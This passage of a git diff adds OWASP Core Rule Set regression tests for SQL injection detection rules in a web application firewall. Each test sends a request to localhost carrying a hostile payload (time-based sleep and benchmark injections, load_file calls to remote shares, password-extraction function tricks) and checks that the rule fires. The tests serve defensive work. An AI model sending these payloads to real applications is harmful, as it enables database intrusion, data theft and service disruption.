POST + port: 80 + uri: "/" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "tempdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "msdb" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-10 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "mysql.db" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-11 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "MSysAccessObjects" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-12 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-13 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "northwind" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-14 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SCHEMA_NAME" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-15 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "DATABASE(" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-16 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "schema_name" + version: HTTP/1.0 + output: + log_contains: id "942140" + - test_title: 942140-17 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "information_schema" + version: HTTP/1.0 + output: + log_contains: id "942140" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml new file mode 100644 index 00000000..3c169b44 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml @@ -0,0 +1,329 @@ +--- +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942150.yaml +tests: + - test_title: 942150-1 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=SKLJDRTZWS89E450W49NQB0W45BN\"=sleep(12)=\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1' and sleep(9) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-3 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1(select*from(select(sleep(5)))d)" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-4 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=unittests@coreruleset.org' (function(){if(typeof foo===\"undefined\"){var a=new Date();do{var b=new Date();}while(b-a<20000);foo=1;}}()) '" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-5 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test')and (select*from(select(sleep(10)))d)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-6 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini' and sleep(91) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-7 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-8 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-9 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-10 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-11 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-12 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-13 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-14 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-15 + desc: "Advanced injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-16 + desc: "Simple injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-17 + desc: "SQLite 'json' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-18 + desc: "SQLite 'json_valid' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log_contains: id "942150" + - test_title: 942150-19 + desc: "SQLite 'glob' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log_contains: id "942150" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml new file mode 100644 index 00000000..c749e8d8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -0,0 +1,190 @@ +--- +meta: + author: "Christian Folini,azurit" + description: Various SQL injection tests + enabled: true + name: 942151.yaml +tests: + - test_title: 942151-1 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-2 + desc: "Simple SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-3 + desc: "Advanced SQL injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-4 + desc: "Simple injection using 'fetch_in_set'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-5 + desc: "SQL injection using 'likelihood' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-6 + desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-7 + desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-8 + desc: "SQL injection using PostgreSQL starts_with() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-9 + desc: "SQL injection using PostgreSQL jsonb_pretty() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-10 + desc: "SQL injection using PostgreSQL json_build_object() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" + - test_title: 942151-11 + desc: "SQL injection using unistr() function" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log_contains: id "942151" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml new file mode 100644 index 00000000..097ed23f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -0,0 +1,55 @@ +--- +meta: + author: "Franziska Bühler" + description: Various SQL injection tests + enabled: true + name: 942152.yaml +tests: + - test_title: 942152-1 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-2 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" + - test_title: 942152-3 + desc: "SQL injection in request header User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942152" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml new file mode 100644 index 00000000..e8013ec5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -0,0 +1,175 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-10 + desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml new file mode 100644 index 00000000..c3f0f366 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942170.yaml +tests: + - test_title: 942170-1 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-2 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log_contains: id "942170" + - test_title: 942170-3 + desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + no_log_contains: id "942170" + - test_title: 942170-4 + desc: "Status Page Test - SQL injection test with select if(x" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=select+if(x" + version: HTTP/1.0 + output: + log_contains: id "942170" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml new file mode 100644 index 00000000..7dbbf800 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -0,0 +1,137 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 + desc: "basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: 